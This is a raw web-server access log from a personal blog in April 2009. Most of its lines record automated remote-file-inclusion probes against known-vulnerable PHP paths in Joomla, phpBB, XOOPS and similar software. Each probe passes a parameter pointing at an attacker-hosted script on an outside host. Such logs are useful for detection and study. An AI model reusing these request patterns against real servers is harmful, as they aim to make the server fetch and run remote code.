210.68.188.206 - - [28/Apr/2009:09:47:06 -0700] "GET /logs/access_081119.log//skin/zero_vote/ask_password.php?dir=http://www.mjswimgear.dk/joomla///administrator/modules/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:09:47:06 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.mjswimgear.dk/joomla///administrator/modules/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:09:47:06 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mjswimgear.dk/joomla///administrator/modules/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:47:32 -0700] "GET /?sourcedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 200 43356 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:47:34 -0700] "GET /?sourcedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 200 43356 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:47:51 -0700] "GET /logs/access_081201.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:47:54 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:47:54 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:47:54 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:47:57 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:47:57 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:47:57 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:47:57 -0700] "GET /logs/access_080308.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.197.152.83 - - [28/Apr/2009:09:48:06 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dark912.altervista.org/id.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.197.152.83 - - [28/Apr/2009:09:48:06 -0700] "GET /logs/access_081226.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dark912.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.197.152.83 - - [28/Apr/2009:09:48:06 -0700] "GET /logs/access_090318.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dark912.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.197.152.83 - - [28/Apr/2009:09:48:06 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://dark912.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:48:31 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:48:34 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:48:34 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:48:37 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:48:37 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:48:37 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:48:42 -0700] "GET /logs/access_081008.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:48:47 -0700] "GET /logs/access_090223.log/?sourcedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.241.252 - - [28/Apr/2009:09:49:07 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fortuna-mebel.ru/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.120.241.252 - - [28/Apr/2009:09:49:07 -0700] "GET /logs/access_081208.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fortuna-mebel.ru/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:49:10 -0700] "GET /logs/access_081026.log%20%20//admin/includes/admin_header.php?level=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:49:15 -0700] "GET /logs/access_090314.log%20%20//admin/includes/admin_header.php?level=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:09:50:42 -0700] "GET /logs/access_080421.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:51:41 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:51:41 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:51:41 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.163.221.167 - - [28/Apr/2009:09:51:42 -0700] "GET /blog/index.php/page/2/ HTTP/1.1" 200 21693 "http://images.google.com.mx/imgres?imgurl=http://dmulk.com/blog/wp-content/gallery/westoc-2008/picture-159_0.jpg&imgrefurl=http://dmulk.com/blog/page/2/&usg=__oddW2Ba4Yztp_Bm5BTcgmqGdeJI=&h=768&w=1024&sz=373&hl=es&start=347&sig2=ssRKnafd2yQGx-kxWEBz8Q&um=1&tbnid=gYtPCQHf9VU7CM:&tbnh=113&tbnw=150&prev=/images%3Fq%3Dflip%2Bflop%2Bsocks%26ndsp%3D18%26hl%3Des%26rlz%3D1T4GGLJ_en%26sa%3DN%26start%3D342%26um%3D1&ei=ETT3SaiILOaGmQeyou2ZDg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "dmulk.com"
201.163.221.167 - - [28/Apr/2009:09:51:43 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 10174 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "dmulk.com"
201.163.221.167 - - [28/Apr/2009:09:51:43 -0700] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20081210 HTTP/1.1" 200 3864 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "dmulk.com"
201.163.221.167 - - [28/Apr/2009:09:51:43 -0700] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.1" 200 5715 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "dmulk.com"
201.163.221.167 - - [28/Apr/2009:09:51:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-159_0.jpg HTTP/1.1" 200 381556 "http://images.google.com.mx/imgres?imgurl=http://dmulk.com/blog/wp-content/gallery/westoc-2008/picture-159_0.jpg&imgrefurl=http://dmulk.com/blog/page/2/&usg=__oddW2Ba4Yztp_Bm5BTcgmqGdeJI=&h=768&w=1024&sz=373&hl=es&start=347&sig2=ssRKnafd2yQGx-kxWEBz8Q&um=1&tbnid=gYtPCQHf9VU7CM:&tbnh=113&tbnw=150&prev=/images%3Fq%3Dflip%2Bflop%2Bsocks%26ndsp%3D18%26hl%3Des%26rlz%3D1T4GGLJ_en%26sa%3DN%26start%3D342%26um%3D1&ei=ETT3SaiILOaGmQeyou2ZDg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "dmulk.com"
201.163.221.167 - - [28/Apr/2009:09:51:47 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.2)" "dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:51:47 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:51:47 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:51:47 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:51:52 -0700] "GET /logs/access_081008.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:51:55 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:51:55 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:51:55 -0700] "GET /logs/access_081012.log%20%20/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:09:51:55 -0700] "GET /logs/access_080610.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:52:01 -0700] "GET /logs/access_090108.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:52:01 -0700] "GET /logs/access_080613.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:53:01 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:53:01 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:53:01 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:53:06 -0700] "GET /logs/access_081008.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:53:07 -0700] "GET /logs/access_081008.log%20%20/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:09:53:14 -0700] "GET /logs/access_081119.log//skin/zero_vote/ask_password.php?dir=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:09:53:14 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:09:53:15 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:54:29 -0700] "GET /logs/access_090223.log/?sourcedir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:55:04 -0700] "GET /logs/access_080928.log//modules/punish/profile.php?exbb[home_path]=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.112.90.164 - - [28/Apr/2009:09:56:04 -0700] "GET /logs/access_080304.log//include.php?path[docroot]=http://xpoison.ucoz.ru/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.112.90.164 - - [28/Apr/2009:09:56:04 -0700] "GET /include.php?path[docroot]=http://xpoison.ucoz.ru/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.112.90.164 - - [28/Apr/2009:09:56:04 -0700] "GET /logs//include.php?path[docroot]=http://xpoison.ucoz.ru/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:56:04 -0700] "GET /logs/access_080928.log//modules/punish/profile.php?exbb[home_path]=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.112.90.164 - - [28/Apr/2009:09:56:08 -0700] "GET /logs/access_080430.log//include.php?path[docroot]=http://xpoison.ucoz.ru/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:56:42 -0700] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:56:42 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:56:43 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:09:57:04 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.mjswimgear.dk/joomla///administrator/modules/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:09:57:04 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.mjswimgear.dk/joomla///administrator/modules/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
163.24.136.10 - - [28/Apr/2009:09:57:04 -0700] "GET /logs/access_081119.log//skin/zero_vote/ask_password.php?dir=http://www.mjswimgear.dk/joomla///administrator/modules/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:57:56 -0700] "GET /logs/access_080412.log//modules/xfsection/modify.php?dir_module=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:57:56 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:57:56 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:57:57 -0700] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:57:58 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:57:58 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:09:58:03 -0700] "GET /logs/access_080427.log//modules/xfsection/modify.php?dir_module=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:09:58:06 -0700] "GET /logs/access_080919.log//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:09:58:06 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:09:58:06 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:09:58:25 -0700] "GET /logs/access_081015.log//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:09:58:45 -0700] "GET /logs//setup.php?dir=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:09:58:45 -0700] "GET /setup.php?dir=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:09:58:45 -0700] "GET /logs/access_090103.log//setup.php?dir=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.186.1.54 - - [28/Apr/2009:09:58:50 -0700] "GET /logs/access_090314.log//setup.php?dir=http://pallmall5.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:59:30 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:59:44 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:10:00:01 -0700] "GET /index.php?dat=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 500 292 "-" "libwww-perl/5.825" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:00:26 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:00:41 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
168.143.19.89 - - [28/Apr/2009:10:01:00 -0700] "GET /index.php?dat=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 500 292 "-" "libwww-perl/5.825" "www.dmulk.com"
74.220.219.113 - - [28/Apr/2009:10:01:10 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:01:25 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.bandbib.com/web/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:10:01:25 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://www.bandbib.com/web/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
140.112.90.164 - - [28/Apr/2009:10:01:25 -0700] "GET /logs/access_080304.log%20%20//include.php?path[docroot]=http://xpoison.ucoz.ru/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.112.90.164 - - [28/Apr/2009:10:01:25 -0700] "GET /logs/access_080430.log%20%20//include.php?path[docroot]=http://xpoison.ucoz.ru/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [28/Apr/2009:10:02:26 -0700] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.227.193.198 - - [28/Apr/2009:10:02:26 -0700] "GET /logs/access_080403.log/index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:02:27 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:10:02:41 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:10:02:46 -0700] "GET /logs/access_080331.log//include/print_category.php?setup[use_category]=1&dir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.198 - - [28/Apr/2009:10:03:00 -0700] "GET /index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:10:03:38 -0700] "GET /logs/access_080331.log//include/print_category.php?setup[use_category]=1&dir=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:10:05:08 -0700] "GET /logs/access_080614.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unixcod.org/modules/mod_donate/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:10:05:08 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unixcod.org/modules/mod_donate/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:10:05:08 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://unixcod.org/modules/mod_donate/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:05:18 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:05:18 -0700] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:05:18 -0700] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:10:05:24 -0700] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
